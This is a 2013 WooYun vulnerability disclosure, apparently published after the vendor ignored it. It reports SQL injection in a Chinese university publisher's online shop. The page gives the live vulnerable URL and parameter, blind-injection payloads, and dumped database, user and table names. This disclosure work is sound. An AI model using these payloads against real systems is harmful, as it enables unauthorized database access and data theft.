当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044131

漏洞标题:陕西师范大学出版总社网上商城注入泄露敏感信息

相关厂商:陕西师范大学出版总社

漏洞作者: adm1n

提交时间:2013-11-28 18:42

修复时间:2014-01-12 18:43

公开时间:2014-01-12 18:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

陕西师范大学出版总社网上商城注入泄露敏感信息

详细说明:

1.http://shop.snupg.com/help/article.jsp?id=12213&nodeid=1088&siteid=42

漏洞证明:

Place: GET
Parameter: siteid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12213&nodeid=1088&siteid=42 AND 2254=2254
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=12213&nodeid=1088&siteid=42 AND SLEEP(5)
---
[11:29:02] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.11
publish@192.168.1.64
current user: 'publish@192.168.1.64'
Database: test
[4 tables]
+---------------------------------------+
| acl_class |
| acl_entry |
| acl_object_identity |
| acl_sid |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: publish
[177 tables]
+---------------------------------------+
| accessreading |
| accessreadtask |
| acl_class |
| acl_entry |
| acl_object_identity |
| acl_sid |
| activity |
| albums |
| applyschool |
| articleatt |
| articleatt_bak |
| articlevideo |
| associate |
| attach |
| attachement |
| attachement_bak |
| authorities |
| booksclass |
| bookspages |
| cartitem |
| cebresource |
| class_forum |
| classes |
| classmanage |
| contacts |
| contribute |
| contribute_agreement |
| contributeaudit |
| contributestate |
| course_count |
| course_count_user_info_list |
| coursemanage |
| datadict |
| depart |
| departtype |
| ebank |
| enplog |
| enpmember |
| experience |
| faq |
| faqtype |
| favorites |
| friend |
| infoclass |
| integraloperation |
| invoiceinfo |
| les_lesson_tachetype_resource_bak |
| les_lessons |
| les_lessons_bak |
| les_lessons_hour |
| les_lessons_tache_type |
| les_lessons_tache_type_bak |
| les_lessons_tache_type_tache |
| les_letatype_tache |
| les_resouce_queryset |
| les_tache |
| les_tachetype |
| lineitem |
| logs |
| logstype |
| mail |
| maillist |
| mailopera |
| mediaclass |
| member |
| memberclasses |
| memberdiscount |
| message |
| monograph |
| monotype |
| msg |
| newschool |
| newscomment |
| notice |
| orderacl |
| orders |
| org_user_res |
| org_user_res_price |
| pagelayout |
| pagelayouttmp |
| pagelayouttmp2 |
| pagelayouttmp3 |
| paper_periodical_rules |
| payinfo |
| paymentbill |
| personalclassinfo |
| photo |
| project_recruitment |
| pubcompany |
| q_money |
| rankvalues |
| releaselib |
| releaselib_bak |
| res_download_info |
| res_grade |
| res_integral_info |
| res_resource_type |
| res_subject |
| res_tag |
| res_version |
| resourceclass |
| resourcedownload |
| review |
| sch_school_info |
| school |
| score_c_s |
| sendorder |
| seq1 |
| sequencetable |
| shipmethod |
| shipmethodextend |
| signcontribute |
| siteinfo |
| ss_authority |
| ss_resource |
| ss_resource_authority |
| ss_role |
| ss_role_authority |
| ss_user |
| ss_user_role |
| subscribemail |
| subscribetype |
| thesis |
| thesistype |
| tmp20131101 |
| tra_answer |
| tra_apply |
| tra_c_s_t |
| tra_c_s_t_c |
| tra_certificate_template |
| tra_certificate_user |
| tra_course |
| tra_course_notice |
| tra_discuss_answer |
| tra_personalwork |
| tra_personalwork_attach |
| tra_question |
| tra_s_t_c |
| tra_syllabus |
| tra_syllabus_score |
| tra_syllabus_task |
| tra_talk |
| tra_task |
| tra_task_course |
| tra_template_input |
| tra_userinfo |
| typestruct |
| typestruct2 |
| ucenter_card_history |
| ucenter_card_info |
| user_rank |
| userpayinfo |
| users |
| usershipmethod |
| videoinfo |
| web_catalog |
| web_datasnip |
| web_dirextfilter |
| web_domain |
| web_domainexhibit |
| web_exhibitgroup |
| web_exhibititem |
| web_pubpage |
| web_resource |
| web_resourcetpl |
| web_rule |
| web_rulestruct |
| web_skin |
| web_skin_resource |
| web_skin_template |
| web_skin_templategroup |
| web_struct |
| web_structexhibit |
| web_template |
| web_templategroup |
| with_cc |
| with_cc_user_info_list |
+---------------------------------------+

修复方案:

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论